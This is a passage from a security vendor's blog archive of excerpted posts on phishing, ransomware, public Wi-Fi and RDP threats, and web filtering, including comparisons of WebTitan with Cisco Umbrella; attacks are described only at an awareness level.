have taken advantage of lapses in security, insufficient staff training, and the vulnerabilities that are introduced when employees are forced to work in an environment that has not been set up remote working. IT teams have had to rapidly purchase new laptops to allow employees to work outside the office and there has not been time to properly secure those devices. VPN infrastructure was not sufficient to cope with the rapid increase in users. Home networks lack the security of corporate networks, and...
by G Hunt |
March 26, 2020 |
Cybersecurity Advice, Cybersecurity News
Cybercriminals are taking advantage of the 2019 Novel Coronavirus pandemic and are exploiting fear to spread malware and steal data. These tactics many not be new, but these campaigns pose a significant threat in the current climate of global fear and worry. People are naturally worried about contracting COVID-19 and will be concerned about the wellbeing of their friends and family members. Many people crave new information to help avoid them avoid illness and protect their families. If that information arrives in an inbox, email attachments may be opened, and links clicked to malicious websites. Even when training is provided to employees and they are taught not to respond to unsolicited messages, open email attachments, or click links in emails from unknown senders, mistakes can still be made. During the COVID-19 crisis, stress levels are high, and this can easily lead to decisions being taken that would not normally be made. Businesses have been forced to allow their employees to work from home, many of whom are now working in a home environment where there are many distractions. Many people do not have home offices where they can quietly work, and a challenging working environment also makes mistakes more likely. Those mistakes can prove very costly. Phishing campaigns are being conducted targeting home workers as they are seen as low-hanging fruit and an easy way to gain access to business networks to install malware, ransomware, and steal sensitive data. Several campaigns have been detected that offer important advice on the 2019 novel coronavirus that impersonate authorities on disease control and prevention such as the U.S. Centers for Disease Control and Prevention (CDC), U.S. Department of Health and Human Services, UK National Health Service, and the World Health Organization (WHO). The phishing campaigns are credible, claim to offer important advice, and are likely to be opened by many individuals. These campaigns seek remote access credentials and distribute malware. Coronavirus maps that display the number of cases per country are being used on many websites, including a legitimate COVID-19 case tracking map on Johns Hopkins University website....
by G Hunt |
December 31, 2019 |
Cybersecurity Advice, Internet Security News
Today there is an increasingly mobile workforce. Workers are able to travel and stay connected to the office and many employees are allowed to work remotely for at least some part of the week. While workers are in the office, security is not a problem for IT departments. Workers connect to the internal network, be that a wired or wireless network, and thanks to the protection of the firewall, their devices and the network are protected. The problem comes when workers move outside the protection of that firewall. Here IT departments struggle to ensure the same level of protection. When workers are travelling for work or are between the home and the office, they often connect to public Wi-Fi hotspots. Connecting to those hotspots introduces risks. While connected, sensitive information could potentially be disclosed which could be intercepted. Malware could also be inadvertently downloaded. When a connection is made to the work network, that malware could easily be transferred. Connecting to untrusted Wi-Fi networks is a major risk. These could be legitimate Wi-Fi services provided on public transport, in coffee shops, or city-wide Wi-Fi networks. While these networks may be safe, there is no telling who may be connected to that network. These Wi-Fi networks are often not monitored, and cybersecurity protections may be poor. There are several possible attack scenarios where an individual could perform malicious acts on users of the Wi-Fi network. One of the biggest risks is a man-in-the-middle attack. In this scenario, a Wi-Fi user will be connected to the network and will believe that they are securely accessing the internet, their email, or even the work network, when the reality is that their connection is anything but secure. A hacker could be listening in and could obtain information from that connection. Through ARP poisoning, a hacker could trick the Wi-Fi gateway and the user’s device into connecting, and traffic would be routed through the hacker’s device where it is intercepted. An attacker could also create an evil twin hotspot. Here a rogue hotspot is created that closely mimics the genuine hotspot. A Wi-Fi user may mistakenly connect to the evil...
by G Hunt |
November 14, 2019 |
Cybersecurity Advice, Internet Security News
The increase in cyberattacks on law firms has highlighted a need for greater security protections, especially to protect against phishing, malware, and ransomware. According to a recent Law.com report, more than 100 law firms are known to have experienced cyberattacks in the past five years: Cyberattacks that have resulted in hackers gaining access to sensitive information and, in many cases, employee, attorney, and client information. Investigations such as this are likely to uncover just a small percentage of successful cyberattacks, as many are resolved quietly and are not reported. Many law firms will be keen to keep a cyberattack private due to the potential damage it could do to a firm’s reputation. The reputation of a law firm is everything. As Law.com explained, there are different data breach reporting requirements in different states. If there is no legal requirement to report the data breaches, they will not be reported. That means that only if reportable information has potentially been compromised will the breach be reported to regulators or made public. It is therefore not possible to tell how many successful cyberattacks on law firms have occurred. However, there has been a steady rise in reported cyberattacks on law firms, as is the case with attacks on other industry sectors. Law.com’s figures are likely to be just the tip of the iceberg. From the perspective of cybercriminals, law firms are a very attractive target. The types of information stored on clients is incredibly valuable and can be used for extortion. Information on mergers and takeovers and other sensitive corporate data can be used to gain a competitive advantage. Cybercriminals are also well aware that if they can deploy ransomware and encrypt client files, there is a higher than average probability that the ransom will be quietly paid. Based on the information that has been made public about law firm data breaches, one of the main ways that law firms are attacked is via email. Many of the data breaches started with a response to a phishing or spear phishing email. Phishing allows cybercriminals to bypass even sophisticated cybersecurity protections as it targets a well-known...
by G Hunt |
September 27, 2019 |
Cybersecurity Advice, Cybersecurity News
Ransomware attacks slowed in 2018 but the malicious file-encrypting malware is back with a vengeance. Ransomware attacks on educational institutions have soared this year, and as the attackers are well aware, these attacks can be extremely profitable. There have been 182 reported ransomware attacks so far this year and 26.9% of those attacks have been on school districts and higher education institutions. The increase has seen education become the second most targeted sector behind municipalities (38.5%) but well ahead of healthcare organizations (14.8%). The reason why the number of ransomware attacks on educational institutions, healthcare, and municipalities is so high compared to other sectors is because attacks are relatively easy to perform and there is a higher than average chance that the ransoms will be paid. Attacks on municipalities mean they can’t access computer systems, and essential services grind to a halt. Police departments can’t access criminal records, courts have to be shut down, and payments for utilities cannot be taken. If hospitals can’t access patient data, appointments have to be cancelled out of safety concerns. In education, teachers cannot record grades and student records cannot be accessed. Administration functions grind to a halt and a huge backlog of work builds up. Some of the recent ransomware attacks on school districts have seen schools forced to send students home. Monroe-Woodbury Central School District in New York had to delay the start of the school year due to its ransomware attack. If students need to be sent home, there is often backlash from parents – Not only because their children are not getting their education, but childcare then needs to be arranged. The costs of these attacks are considerable for all concerned. Each day without access to systems costs schools, universities, municipalities, and hospitals a considerable amount of money. Downtime is by far the biggest cost of these attacks. Far greater than any ransom payment. It is no surprise that even when ransom demands are for tens or hundreds of thousands of dollars, they are often paid. The cost of continued losses as a result of the attacks makes paying...
by G Hunt |
August 30, 2019 |
Cybersecurity Advice, Cybersecurity News
2017 was a bad year for ransomware attacks, but as 2018 progressed it was starting to look like the file-encrypting malware was being abandoned by cybercriminals in favor of more lucrative forms of attack. Between 2017 and 2018 there was a 30% fall in the number of people who encountered ransomware compared to the previous year, and the number of new ransomware variants continued to decline throughout 2018; however, now, that trend has been reversed. 2019 has seen a sharp increase in attacks. Figures from Malwarebytes indicate there was a 195% increase in ransomware attacks in Q1, 2019 and that increase has continued in Q2. A new report from Kaspersky Lab has shown that not only are attacks continuing to increase, the number of new ransomware variants being used in these attacks is also increasing sharply. Kaspersky Lab identified 16,017 new ransomware modifications in Q2, 2019, which is more than twice the number of new ransomware modifications detected in Q2, 2018. In addition to updates to existing ransomware variants, Q2, 2019 saw 8 brand new malware families detected. Kaspersky Lab tracked 230,000 ransomware attacks in Q2, which represents a 46% increase from this time last year. Far from ransomware dying a slow death, as some reports in 2018 suggested, ransomware is back and is unlikely to go away any time soon. Not only are attacks increasing in frequency, ransom demands have increased sharply. Ransom demands of hundreds of thousands of dollars are now the norm. Two Florida cities paid a combined total of $1 million for the keys to unlock files encrypted by ransomware. Jackson County in Georgia paid $400,000 for the keys to unlock the encryption that crippled its court system, and recently, a massive ransomware attack that impacted 22 towns and cities in Texas saw a ransom demand of $2.5 million issued. Earlier this year, the developers of GandCrab ransomware shut down their popular ransomware-as-a service offering. They claimed to have made so much money from attacks that they have now taken early retirement. Despite GandCrab ransomware being one of the most widely used ransomware variants for the past 18 months, the shut down has not been accompanied...
by G Hunt |
July 12, 2019 |
Cybersecurity Advice, Internet Security News
A Google Calendar phishing campaign is being conducted that abuses trust in the app to get users to click malicious hyperlinks. Cybercriminals are constantly developing new phishing tactics to convince end users to click links in emails or open email attachments. These campaigns are often conducted on organizations using Office 365. Campaigns are tested on dummy Office 365 accounts to make sure messages bypass Office 365 spam defenses. Messages are carefully crafted to maximize the probability of an individual clicking the link and the sender name is spoofed to make the message appear to have been sent from a known and trusted individual. Businesses that implement email security solutions that incorporate DMARC authentication can block the vast majority of these email spoofing attacks. Office 365 users that use a third-party anti-phishing solution for their Office 365 accounts can make sure malicious messages are blocked. Along with end user training, it is possible to mount a solid defense against phishing and email impersonation attacks. A new phishing tactic is being used in an active campaign targeting businesses which achieves the same aim as an email-based campaign but uses a personal calendar app to do so. Phishing campaigns have one of two main aims – To steal credentials for use in a further attack or to convince the user to install some form of malware or malicious code. This is most commonly achieved using an embedded hyperlink in the email that the user is urged to click. In the Google Calendar phishing attacks, events are added into app users’ calendars along with hyperlinks to the phishing websites. This is possible because the app adds invites to the calendar agenda, even if the invite has not been accepted by the user. All the attacker needs to do is send the invite. As the day of the fictitious event approaches, the user may click the link to find out more. To increase the likelihood of the link being clicked, the attacker sets event reminders so the link is presented to the user on multiple occasions. This attack method is only possible with Google Calendar in its default setting. Unfortunately, many users will not have updated their settings...
by G Hunt |
June 28, 2019 |
Cybersecurity Advice, Cybersecurity News
The FBI’s Internet Crime Complaint Center (IC3) has issued a warning about the increasing number of phishing websites using HTTPS. The green padlock next to a URL once gave an impression of security. Now it is a false sense of security for many internet users. HTTPS or Hyper Text Transfer Protocol Secure to give it its full name, indicates the website holds a valid certificate from a trusted third-party. That certificate confirms that the website is secure and any data transmitted between the browser and the website will be encrypted to prevent interception in transit. The public has been taught to look for the green padlock and HTTPS before entering card details or other sensitive information. However, the padlock does not mean that the website being visited is genuine. It only means any information transmitted is secured in transit between the browser and the website. If you are buying a pair of shoes from Amazon, all well and good. If you are on a website controlled by a cybercriminal, HTTPS only means that the cybercriminal will be the only person stealing your data. Cybercriminals create realistic phishing webpages that imitate well-known brands such as Microsoft and Google to obtain login credentials or banks to obtain banking information. These phishing pages can be set up on dedicated phishing websites or phishing kits can be added to previously compromised websites. Traffic is then generated to those webpages with an email phishing campaign. If one of the links in the email is clicked, a user will be directed to a website that requests some information. If the website starts with HTTPS and displays the green padlock, the user may mistakenly believe the site is genuine and that it is safe to disclose sensitive information. The IC3 alert was intended to raise awareness of the threat from HTTPS phishing and make the public aware of the true meaning of the green padlock and never to trust a website because it starts with HTTPS. Businesses should take note and make sure they include HTTPS phishing in their security awareness training programs to raise awareness of the threat with employees. A web filter can greatly reduce the risk of HTTPS phishing...
by G Hunt |
January 31, 2019 |
Cybersecurity Advice
Phishing is the number one threat faced by businesses and attacks are increasing across all industry sectors. Businesses of all sizes are being targeted by hackers. The risk of phishing attacks should not be underestimated. The High Cost of a Data Breach A successful phishing attack that results in a data breach can be incredibly costly to resolve. A 2019 Radware survey suggests the cost of a successful cyberattack has increased to $1.1 million, while the Ponemon Institute’s Cost of a Data Breach Study in 2018 placed the average cost at $3.86 million. The Anthem Inc. data breach of 2015, that resulted in the theft of 78.8 million health plan members’ personal information, started with a phishing email. The attack resulted in losses well over $100 million. In 2017, a phishing email sent to a MacEwan University employee resulted in a fraudulent wire transfer of $11.8 million to the attacker’s bank account. Essential Anti-Phishing Controls for Businesses For most businesses there are two essential elements to anti-phishing defenses. A spam filtering solution to identify phishing emails and block them before they are delivered to employees’ inboxes and training for staff to ensure that if a malicious email makes it past the perimeter defenses, it can be identified as such before any harm is caused. A spam filter is quick and easy to implement, although care must be taken to choose the correct solution. Not all spam filtering and anti-phishing solutions are created equal. The Danger of Relying on Office 365 Anti-Phishing Controls Many businesses now use Office 365 for email. 155 million business (and growing) are now using Office 365. That makes Office 365 a major target for hackers. Microsoft does provide anti-phishing and anti-spam protection through its Advanced Threat Protection (APT) offering for Office 365. APT is an optional extra and comes at an additional cost. APT provides a reasonable level of protection against phishing, but ‘reasonable’ is not sufficient for many businesses. APT is certainly better than nothing, but it does not provide the same level of protection as a third-party spam filtering solution from a dedicated cybersecurity solution...
by G Hunt |
January 28, 2019 |
Cybersecurity Advice, Web Filtering
The biggest problem with compiling a comparison of WebTitan Cloud v Cisco Umbrella is that the Cisco Umbrella range consists of four packages with an increasing number of capabilities per package. Additionally, there is a lack of transparency about Cisco Umbrella pricing and how many add-ons a business may need to filter the Internet effectively. When Cisco Systems Inc. acquired OpenDNS in 2015, there was only one Cisco DNS filtering and Internet security package available – the former OpenDNS Umbrella. Since the acquisition, Cisco has broken down the Umbrella into four sets of capabilities – ostensibly to better meet the needs of all businesses; but, in practice, to disguise the cost of the packages. By comparison, WebTitan Cloud is similar in many ways to v1 launched in 2009. Naturally there have been some improvements made to its capabilities along the way; however, the DNS filtering and Internet security solution is still as flexible and scalable as ever it was to meet the needs of businesses and Managed Service Providers (MSPs) of all sizes. WebTitan Cloud v Cisco Umbrella Comparison The best way to compare WebTitan Cloud v Cisco Umbrella is to list a selection of capabilities in each Cisco Umbrella package and then see where WebTitan Cloud fits into the range. The following is a snapshot of the capabilities of each Cisco Umbrella package which demonstrates how the sophistication of each package increases as you work through the range: The key points to note are: The DNS Essentials package does not inspect and decrypt SSL traffic. This means that any encrypted website that has not yet been identified as a threat will bypass the DNS filter. Both the DNS Essentials and DNS Advantage packages lack granular filtering inasmuch as it is only possible to block or allow website access by domain name, rather than by URL. Although classified as a Secure Access Service Edge (SASE) solution, the SIG Essentials package lacks some key service edge security capabilities and is limited in others. The SIG Advantage package includes many capabilities that businesses may already have access to via other security solutions (i.e., Microsoft Sentinel, Amazon Security Lake,...
by G Hunt |
December 31, 2018 |
Cybersecurity Advice, Internet Privacy
If you subscribe to a Cisco Umbrella DNS filtering and Internet security service, it may be worth your while considering a change from Cisco Umbrella to WebTitan Cloud. In this post we explain some of the main benefits of changing from Cisco Umbrella to WebTitan and illustrate this with an example from the education sector. Cisco Umbrella has evolved from the former OpenDNS Enterprise service to a four-tiered DNS filtering and Internet security service. At the entry-level tier, businesses get a less-than-ideal service with basic web filtering capabilities that lack SSL decryption and inspection; while, at the top tier, businesses can find themselves paying for services they may never use or that are already present in other security solutions. Selecting the right tier of service to best protect the business from web-borne threats and control Internet activity is not the only challenge. One of the reasons businesses change from Cisco Umbrella to WebTitan is a lack of transparency about the cost of Cisco Umbrella – notwithstanding that businesses not only have to pay the licensing fee, but also the cost of mandatory and optional add-ons to maximize the effectiveness of the service. Cisco Umbrella Licensing Like most software services, Cisco Umbrella licensing is via a subscription service. Terms are for one year or three years, and in most cases must be paid all upfront. The licensing cost does not include mandatory onboarding and technical support, while there is a further “optional add-on” for premium support if a business wants its calls to support to be prioritized. Basically, businesses have to pay twice to get a decent level of support from Cisco. Other optional add-ons vary according to which tier is subscribed to – and some are not available in all tiers. For example, if you want to identify which internal IP address was responsible for a malware download, you have to subscribe to a secondary Cisco service. However, this option is not available to subscribers of the DNS Essentials tier. Other optional add-ons and limitations by tier are illustrated in the table below. Cisco Umbrella Pricing Cisco Umbrella pricing is variable depending on the number of...
by G Hunt |
December 12, 2018 |
Cybersecurity Advice, Internet Security News
It is straightforward to implement security controls to protect wired networks, but many businesses fail to apply the same controls to improve WiFi security, often due to a lack of understanding about how to improve wireless access point security. In this post we cover some of the main threats associated with WiFi networks and explain how easy it can be to improve wireless access point security. Wireless Access Points are a Security Risk Most businesses now apply web filters to control the types of content that can be accessed by employees on their wired networks but securing wireless networks can be more of a challenge. It is harder to control and monitor access and block content on WiFi networks. Anyone within range of the access point can launch an attack, especially on public WiFi hotspots which have one set of credentials for all guest users. It is therefore essential that controls are implemented to improve wireless access point security and protect users of the WiFi network. WiFi Security Threats A single set of credentials means cybercriminals are afforded a high degree of anonymity. That allows them to use WiFi networks to identify local network vulnerabilities virtually undetected. They could conduct brute force attacks on routers, for example, or use WiFi access to inject malware on servers that lack appropriate security. If access is gained to the router, attacks can be launched on connected devices, and malware can be installed on multiple end points or even POS systems to steal customers’ credit/debit card information. The cyberattack on Dyn is a good example of how malware can be installed and used for malicious purposes. The DNS service provider was attacked which resulted in large sections of the Internet being made inaccessible. A botnet of more than 100,000 compromised routers and IoT devices was used in the attack. Man-in-the-Middle attacks are also common on Wi-Fi networks. Any unencrypted content can be intercepted, such as if information is exchanged between a user and a HTTP site, rather than HTTPS, if a VPN is not used. Public WiFi networks are often used for all manner of nefarious purposes due to the anonymity provided. If users take...
by G Hunt |
December 12, 2018 |
Cybersecurity Advice, Network Security
In this post we explore the use of Internet filtering to improve employee productivity, including statistics from recent surveys that show how many companies are now choosing to control employee Internet access more carefully. Employee Productivity Falls on Black Friday and Cyber Monday The staffing firm Robert Half Technology recently conducted a survey on 2,500 chief information officers (CIOs) across 25 metropolitan areas in the United States and more than 1,000 U.S. officer workers over 18 years of age to determine how Black Friday and Cyber Monday affect employee productivity. The results of the survey provide an indication on what goes on throughout the year, but Black Friday and Cyber Monday were studied as they are the two busiest days for online shopping. The survey results show that three quarters of employees spent at least some of Cyber Monday shopping online on a work device. Four out of 10 workers said they spent more than an hour looking for bargains online on Cyber Monday while they were at work. 23% said they were expecting to spend even longer than that this year. 46% of workers said they would be online shopping on their work computers during their lunch hour and breaks, but 29% said they would be shopping throughout the day and would be keeping browser tabs open. 20% of workers said they would do online shopping at work in the morning. While policies on accessing pornography may have been made crystal clear, online shopping is something of a gray area. 31% of employees were not aware of their company’s stance on online shopping on work devices. 43% said their employers permit it and 26% said it is not permitted. The survey of CIOs shows 49% of companies allow online shopping within reason but that they monitor employee Internet use. 22% said they allow totally unrestricted Internet access while 29% have implemented solutions to block access to online shopping sites. In June 2018, Spiceworks published the results of a survey that showed 58% of organizations actively monitor employee Internet activity and 89% of organizations use Internet filters to block at least one category of Internet content. Most surveyed companies use Internet...
by G Hunt |
December 6, 2018 |
Cybersecurity Advice, Internet Security News
A credential stuffing attack has led to a Dunkin Donuts data breach which has seen some customer data compromised. While the breach was limited and most attempts to access customers’ DD Perks accounts were blocked, the incident does highlight the risks of password reuse. It is unclear exactly how many customers have been affected, but for certain customers, the attackers may have gained access to their DD perks accounts – The loyalty program run by the donut company. The Dunkin Donuts data breach was limited to first and last names, email addresses, DD Perks account numbers, and QR codes. The method used to gain access to customers DD perks accounts was unsophisticated, cheap to conduct, and in the most part can be conducted automatically. Low cost and little effort makes for a winning combination for hackers. The Dunkin Donuts data breach did not involve internal systems and no credentials were stolen from the donut giant. Customers’ usernames (email addresses) and passwords were obtained from security breaches at other companies. Those usernames and passwords were then utilized in an automated attack on Dunkin Donuts customers’ DD Perks accounts. Dunkin Donuts has performed a password reset and affected users will be required to choose a new password. New DD Perks account numbers will be given to affected customers and their card balances will be transferred to the new account. Since Dunkin Donuts did not expose any passwords and its systems remained secure, the only individuals that will have been affected are those that have used the same password for their DD Perks account that they have used on other online platforms. The Risks of Password Reuse Hackers obtain credentials from multiple data breaches, compile the data to create a list of passwords that have previously been used with a specific email address, then conduct what is known as a credential stuffing attack. Multiple login attempts are made using the different passwords associated with an email address. The Dunkin Donuts data breach demonstrates the importance of good password hygiene and the risks of password reuse. Every user account must be secured with a strong, unique password – One that has...
by G Hunt |
November 30, 2018 |
Cybersecurity Advice, Internet Privacy
There are many reasons why businesses should implement a WiFi filtering solution, but one of the most important aspects of WiFi filtering is protecting your brand. The Importance of Brand Protection It takes a lot of hard work to create a strong brand that customers trust, but trust can easily be lost if a company’s reputation is damaged. If that happens, rebuilding the reputation of your company can be a major challenge. Brand reputation can be damaged in many ways and it is even easier now thanks to the Internet and the popularity of social media sites. Bad feedback about a company can spread like wildfire and negative reviews are wont to go viral. Smart business owners are proactive and take steps to protect their digital image. They are quick to detect and enforce online copyright infringements and other forms of brand abuse. They monitor social media websites and online forums to discover what people are saying about their company and how customers feel about their products and services. They also actively manage their online reputation and take steps to reinforce their brand image at every opportunity. Cyberattacks Can Seriously Damage a Company’s Reputation One aspect of brand protection that should not be underestimated is cybersecurity. There are few things that can have such a devastating impact on the reputation of a company as a cyberattack and data breach. A company that fails to secure its POS systems, websites, and network and experiences a breach that results in the theft of sensitive customer data can see their reputation seriously tarnished. When that happens, customers can be driven to competitors. How likely are customers to abandon a previously trusted brand following a data breach? A lot more than you may think! In late 2017, the specialist insurance services provider Beazley conducted a survey to find out more about the impact of a data breach on customer behavior. The survey was conducted on 10,000 consumers and 70% said that if a company experienced a data breach that exposed their sensitive information they would no longer do business with the brand. WiFi Filtering and Protecting Your Brand The use of Wi-Fi filtering for protecting...
by G Hunt |
November 23, 2018 |
Cybersecurity Advice, Network Security
DNS web filtering for MSPs is an easy way to improve security for your clients, save them money, and boost your profits. This post explains the benefits of a DNS-level web filter for MSPs and their clients. DNS web filtering is a great way for MSPs to boost profits, save clients money, and better protect them from cyber threats. Web filtering is an essential cybersecurity measure that businesses of all sizes should be using as part of their arsenal against malware, ransomware, botnets and phishing attacks. However, many MSPs fail to include web filtering in their security offerings and consequently miss out on an important income stream: One that requires little effort and generates regular monthly revenue. What Are the Benefits of Web Filtering? There are two main benefits of web filtering: Enforcing Internet usage policies and improving cybersecurity. Employees need to be able to access the Internet for work purposes, but many employees spend a considerable percentage of their working day accessing websites that have no work purpose. Cyberslacking costs businesses dearly. Businesses that do not filter the Internet will be paying their employees to check personal mail, view YouTube videos, visit dating websites, and more. A web filter will help to curb these non-productive activities and will also prevent employees from accessing inappropriate or illegal web content which can prevent legal and compliance issues. A recent study by Spiceworks revealed the extent of the problem. 28% of employees at large companies (more than 1,000 employees) spend more than four hours a week on personal Internet use and the percentages increase to 45% for mid-sized businesses and 51% for small businesses. The difference in those figures reflects the fact that more large businesses have implemented web filters. 89% of large companies have implemented a web filter to curb or prevent personal Internet usage and, as a result, they benefit from an increase in productivity of the workforce. Web filtering is essential in terms of cybersecurity. The Spiceworks study revealed 90% of large companies use a web filter to block malware and ransomware infections. A web filter prevents...
by G Hunt |
November 15, 2018 |
Cybersecurity Advice, Cybersecurity News
The biggest cyber threat to SMBs is ransomware, according to Dato’s State of the Channel Report. While other forms of malware pose a serious risk and the threat from phishing is ever present, ransomware was considered to be the biggest cyber threat to SMBs by the 2,400 managed service providers that were polled for the study. Many SMB owners underestimate the cost of mitigating a ransomware attack and think the cost of cybersecurity solutions to prevent attacks, while relatively low, are not justified. After all, according to Datto, the average ransom demand is just $4,300 per attack. However, the ransom payment is only a small part of the total cost of mitigating an attack. The final cost is likely to be ten times the cost of any ransom payment. Datto points out that the average total cost of an attack on an SMB is $46,800, although there have been many cases where the cost has been far in excess of that amount. One of the most common mistakes made by SMBs is assuming that attacks will not occur and that hackers are likely to target larger businesses with deeper pockets. The reality is SMBs are being targeted by hackers, as attacks are easier to pull off. SMBs tend not to invest heavily in cybersecurity solutions as larger businesses. Anti-Virus Software is Not Effective at Preventing Ransomware Attacks Many SMB owners mistakenly believe they will be protected by anti-virus software. However, the survey revealed that 85% of MSPs said clients that experienced a ransomware attack had anti-virus solutions installed. Anti-virus software may be able to detect and block some ransomware variants, but since new forms of ransomware are constantly being developed, signature-based cybersecurity solutions alone will not offer a sufficient level of protection. Many SMBs will be surprised to hear just how frequently SMBs are attacked with ransomware. More than 55% of surveyed MSPs said their clients had experienced a ransomware attack in the first six months of this year and 35% experienced multiple attacks on the same day. Some cybersecurity firms have reported there has been a slowdown in ransomware attacks as cybercriminals are increasingly turning to cryptocurrency...
by G Hunt |
November 8, 2018 |
Cybersecurity Advice, Internet Security News
Most businesses are aware of the importance of securing their Wi-Fi networks; however, in some industry sectors Wi-Fi security has not been given the importance it requires. Wi-Fi security for hotels, for instance, is often lacking, even though the hospitality sector is being actively being targeted by cybercriminals who see hotel Wi-Fi as a rich picking ground. Hotel Chains are Under Attack Hotels are an attractive target for cybercriminals. They satisfy the two most important criteria for cybercriminals when selecting targets. Valuable data that can be quickly turned into profit and relatively poor cybersecurity which makes conducting attacks more straightforward. In 2018, there have been several major cyberattacks on hotel groups. In November 2018, Federal Group, which runs luxury hotels in Tasmania, experienced an email security incident that exposed the personal data of some of its members. A cyberattack on the Radisson Hotel Group was also reported. In that case it resulted in the exposure of the personal information of its loyalty program members. In August one of China’s largest chains of hotels – Huazhu Hotels Group Ltd – which operates 13 hotel brands – suffered a cyberattack that affected an estimated 130 million people. In June one of Japan’s largest hotel groups, Prince Hotels & Resorts, experienced a cyberattack that impacted almost 125,000 customers. In 2017 there were major data breaches at Hilton, Hyatt Hotels Corporation, Trump Hotels, Four Seasons Hotels, Loews Hotels, Sabre Hospitality Solutions, and InterContinental Hotels Group to name but a few. The Cost of a Hotel Data Breach When a data breach occurs the costs quickly mount. Access to data and networks must be blocked rapidly, the breach must be investigated, the cause must be found, and security must be improved to address the vulnerabilities that were exploited. That invariably requires consultants, forensic investigators and other third-party contractors. Affected individuals must be notified and credit monitoring and identity theft protection services may need to be offered. The direct costs of a hotel data breach are considerable. The Ponemon Institute calculated the...
by G Hunt |
October 24, 2018 |
Cybersecurity Advice, Internet Privacy
Many businesses want to block websites at work and exercise greater control over employee internet access. Acceptable internet usage policies can be developed and employees told what content they are allowed to access at work, but there are always some employees that will ignore the rules. In some cases, policy violations may warrant instant dismissal or other disciplinary action, which takes HR staff away from other important duties. If staff are fired, replacements must be found, trained, and brought up to speed, and the productivity losses that result can be considerable. The Dangers of Unfettered Internet Access Before explaining how to block websites at work, it is worthwhile explaining the problems that can arise from the failure to exert control over the content that can be accessed through wired and wireless networks. While extreme cases of internet abuse need to be tackled through HR, low level internet abuse can also be a problem. Any time an employee accesses a website for personal reasons, it is time that is not being spent on work duties. Checking emails or quickly visiting a social media website is unlikely to have a major impact on productivity, but when cyber-slacking increases its effect can certainly be felt. If all employees spent 30 minutes a day on personal internet use, the productivity losses would be be considerable – A business with 100 workers would lose 50 hours of working time a day, or 1,100 hours a month! In addition to lost opportunities, internet use carries a risk. Casual surfing of the internet by employees increases the probability of users encountering malware. The accessing of personal webmail at work could easily result in a malware infection on a work device, as personal mail accounts are not protected by the filtering controls of an organization’s email security gateway. If illegal activities are taking place at work, the legal ramifications can be considerable. It will be the business that is liable in many cases, rather than the individual employee. The easiest solution is for businesses to enforce their acceptable internet usage policies and simply block websites at work that are not required for normal working...
by G Hunt |
September 30, 2018 |
Cybersecurity Advice, Internet Security News
Windows Remote Desktop Protocol attacks are one of the most common ways cybercriminals gain access to business networks to install backdoors, gain access to sensitive data, and install ransomware and other forms of malware. This attack method has been increasing in popularity over the past two years and there has also been a notable rise in darknet marketplaces selling exposed RDP services and RDP login credentials. The high number of Remote Desktop Protocol attacks has prompted the Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3) and the Department of Homeland Security to issue an alert to businesses in the United States to raise awareness of the threat. Remote Desktop Protocol is a proprietary Windows network protocol that allows individuals to remotely access computers and servers over the Internet and gain full control of resources and data. RDP is often used for legitimate purposes, such as allowing managed security service providers (MSSPs) and managed service providers (MSPs) to remotely access devices to provide computer support without having to make a site visit. Through RDP, input such as mouse movements and keystrokes can be transmitted over the Internet with a graphical user interface sent back. In order to gain access to a machine using RDP, a user must be authenticated by supplying a username and password. Once a user is authenticated, the resources on that device can be accessed. While authorized individuals can use RDP connections, so too can cybercriminals if they have access to login credentials or are able to guess usernames and passwords. As with any software, RDP can contain flaws. For instance, flaws in the CredSSP encryption mechanism could be exploited to perform man-in-the-middle attacks. Cybercriminals are identifying vulnerable RDP sessions over the Internet and are exploiting them to gain access to sensitive information and conduct extortion attacks. The threat actors behind SamSam ransomware, which has been used in many attacks on U.S. businesses, educational institutions, and healthcare providers, often gain access to networks through brute force attempts to guess weak passwords. The threat actors...
by G Hunt |
August 27, 2018 |
Cybersecurity Advice, Cybersecurity News
Princess Locker ransomware has now morphed into Princess Evolution ransomware. The latest variant is one of several cryptoransomware threats that maximize the number of infections by using an affiliate distribution model – termed Ransomware-as-a-Service or RaaS. RaaS sees affiliates given a percentage of the ransom payments they generate, while the author of the ransomware also takes a cut of the profits. Under this business model, the author can generate a much higher number of infections, which means more ransom payments. The affiliates get to conduct ransomware campaigns without having to develop their own ransomware and the author can concentrate on providing support and developing the ransomware further. For Princess Evolution ransomware, the split is 60/40 in favor of the affiliate. The RaaS is being promoted on underground web forums and prospective affiliates. Ransomware attacks involving RaaS use a variety of methods to distribute the malicious payload as multiple actors conduct campaigns. Spam email is usually the main delivery mechanism for RaaS affiliates as it is easy to purchase large quantities of email addresses on darkweb sites to conduct campaigns. Brute force attacks are also commonly conducted. Princess Evolution ransomware has also been loaded into the RIG exploit kit and is being distributed via web-based attacks. These web-based attacks take advantage of vulnerabilities in browsers and browser plug-ins. Exploits for these vulnerabilities are loaded into the kit which is installed on attacker-controlled web domains. Often legitimate sites are compromised have the exploit kit loaded without the knowledge of the site owner. Traffic is generated to the websites through search engine poisoning, malvertising, and spam emails containing hyperlinks to the websites. If a user visits the website and has an exploitable vulnerability, the Princess Evolution ransomware will be silently downloaded. At this stage, there is no free decryptor for Princess Evolution ransomware. If this ransomware variant is downloaded and succeeds in encrypting files, recovery is only possible by paying the ransom for the keys to unlock the encryption or rebuilding...
by G Hunt |
June 29, 2018 |
Cybersecurity Advice, Internet Privacy
Why should businesses use a web filtering solution? Listed below are three key benefits of web filtering for businesses. Protection Against Exploit Kits Email spam is the most common attack vector used to deliver malware, and while the threat from exploit kits is nowhere near the level in 2015 and 2016, they still pose a problem for businesses. Exploit kits are web-based apps that are loaded onto websites controlled by cybercriminals – either their own sites or sites that have been hijacked. Exploit kits contain code that exploits vulnerabilities in web browsers, plugins and browser extensions. When a user with a vulnerable browser visits a malicious URL containing an exploit kit, the vulnerability is exploited and malware is downloaded. With browsers becoming more secure, and Flash being phased out, it has become much harder to infect computers with malware via exploit kits and many threat actors have moved on to other methods of attack. However, some exploit kits remain active and still pose a threat. The exploit kits currently in use – RIG for example – contain multiple exploits for known vulnerabilities. Most of the vulnerabilities are old and patches have been available for months or years, although zero-day vulnerabilities are occasionally uploaded. Exploit kits are also updated with recently disclosed proof-of-concept code. Exploit code for two recently discovered vulnerabilities: one in Internet Explorer (CVE-2018-8174) and one in Adobe Flash (CVE-2018-4878) have been added to EKs already. Keeping browsers and plugins up to date and using a top antivirus solution will provide a good level of protection, although businesses can further enhance security by using a web filter. Web filtering for businesses ensures that any attempt to access a website known to host an exploit kit will be blocked. Blocking Phishing Attacks Phishing is one of the biggest threats faced by businesses. Phishing is a method of 